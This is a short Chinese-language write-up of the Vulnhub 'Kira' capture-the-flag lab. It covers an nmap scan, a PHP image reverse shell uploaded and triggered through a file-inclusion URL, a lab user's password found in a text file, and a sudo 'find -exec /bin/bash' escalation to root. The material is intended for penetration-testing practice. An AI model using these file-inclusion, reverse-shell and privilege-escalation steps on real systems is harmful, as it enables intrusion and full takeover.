Vulnhub:Kira: CTF靶机

kali:192.168.111.111

靶机:192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

在这里插入图片描述

访问80端口

Vulnhub:Kira: CTF靶机_第1张图片

点击upload发现是个上传点

Vulnhub:Kira: CTF靶机_第2张图片

点击language发现存在文件包含

Vulnhub:Kira: CTF靶机_第3张图片

Vulnhub:Kira: CTF靶机_第4张图片

上传php图片马再利用文件包含反弹shell

Vulnhub:Kira: CTF靶机_第5张图片

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

Vulnhub:Kira: CTF靶机_第6张图片

Vulnhub:Kira: CTF靶机_第7张图片

提权

/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码:Password123!@#

在这里插入图片描述

Vulnhub:Kira: CTF靶机_第8张图片

bassam用户sudo权限

Vulnhub:Kira: CTF靶机_第9张图片

提权方法:https://gtfobins.github.io/gtfobins/find/#sudo

Vulnhub:Kira: CTF靶机_第10张图片

提升为root

sudo -u root find . -exec /bin/bash \;

Vulnhub:Kira: CTF靶机_第11张图片

你可能感兴趣的:(安全,web安全,网络安全)